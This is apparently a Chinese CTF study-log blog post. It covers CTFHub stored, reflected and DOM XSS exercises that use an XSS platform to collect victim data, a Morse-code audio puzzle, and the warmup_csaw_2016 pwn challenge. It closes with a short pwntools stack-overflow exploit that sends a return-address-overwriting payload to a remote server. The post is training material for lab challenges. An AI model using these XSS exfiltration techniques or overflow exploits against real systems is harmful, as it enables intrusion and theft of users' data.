当前位置: 首页 > article >正文

2.11学习记录

web——CTFHub XSS学习

学习资料:xss(跨站攻击)

原理

1.黑客发送带有xss恶意脚本的链接给用户
2.用户点击了恶意链接,访问了目标服务器(正常的服务器)
3.目标服务器(正常的服务器)将xss同正常的页面返回到用户的浏览器中
4.用户浏览器解析了网页中xss恶意代码,向恶意服务器(也就是这里我们搭建的xss平台)发起请求
首先需要有一个搭建的xss平台TLXSS平台

存储型

在这里插入图片描述可以从TLXSS平台里的预设代码中得到恶意代码(第二个),将其输入第一个框在这里插入图片描述第二个输入框是模拟目标网站用户点击受污染的 URL 链接,如果点击了这个链接,那么刚刚注入的 XSS 代码将会被执行并传递到本地服务器中(TLXSS项目)在这里插入图片描述回到刚刚的项目上就可以得到信息了在这里插入图片描述
在这里插入图片描述

反射型

跟存储型一样,只是会将我们的恶意输入回显在URL上,需要重新创建一个项目
在这里插入图片描述在这里插入图片描述在这里插入图片描述完成恶意注入后返回页面后就能得到flag了在这里插入图片描述

DOM反射

DOM型XSS:基于文档对象模型Document Objeet Model,DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。
本题已经指明是DOM反射攻击,先查看网页源码在这里插入图片描述发现可以操控的地方,先将语句闭合

在这里插入图片描述接着重复之前的操作,将上传后的URL复制下来给机器人触发,然后在TLXSS上找到记录在这里插入图片描述

misc

来首歌吧

拿到音频文件后用stego看一下,结果发现了这种波形图,手搓一下
在这里插入图片描述得到 … -… -.-. ----. …— … -… …- ----. -.-. -… ----- .---- —… —… …-. … …— . -… .---- --… -… --… ----- ----. …— ----. .---- ----. .---- -.-.

用摩斯密码工具解决
在这里插入图片描述

pwn

warmup_csaw_2016

拿到附件发现没有保护,放到ida看看在这里插入图片描述找到主调函数在这里插入图片描述代码分析:调用两个write函数输出,然后sprintf函数利用%p将sub_40060函数地址打印出来放到s里面,然后由write函数打印出来,由于是64位所以write那是9
还发现了get函数在这里插入图片描述存在栈溢出,用shift+F12查看是否存在有用信息在这里插入图片描述发现了get flag指令,所以exp里需要写为get flag

from pwn import *
r = remote('node3.buuoj.cn',29469)
offset = 0x40+8
payload = offset*'a' + p64(0x000400611)
r.sendline(payload)
r.interactive()

http://www.kler.cn/a/543007.html

相关文章:

  • 【EXCEL】【VBA】处理GI Log获得Surf格式的CONTOUR DATA
  • PostgreSQL错误: 编码“UTF8“的字符0x0xe9 0x94 0x99在编码“WIN1252“没有相对应值
  • 【EXCEL】【VBA】最大值行索引查找与Z字形数据重排
  • kamailio关于via那点事
  • 将 AMD Zynq™ RFSoC 扩展到毫米波领域
  • 软件工程-决策树决策表
  • Unity 打造游戏资源加密解密系统详解
  • ElementUI的<el-image>组件引用网络图片加载失败
  • 从词袋到Transformer:自然语言处理的演进与实战
  • Maven 多模块项目管理
  • 回溯---相关习题,经验总结
  • DeepSeek-V2 论文解读:混合专家架构的新突破
  • 青少年编程与数学 02-009 Django 5 Web 编程 07课题、数据迁移
  • 从零构建高可用MySQL集群:Percona XtraDB Cluster 实战部署
  • 《qt open3d中添加最远点采样》
  • STM32 如何将printf函数和串口函数重定向
  • Redis主从复制高延迟问题解决思路
  • 【Elasticsearch】Bucket Selector Aggregation
  • 微信小程序的behaviors和vuex功能对比
  • 如何在Java中使用JUnit进行单元测试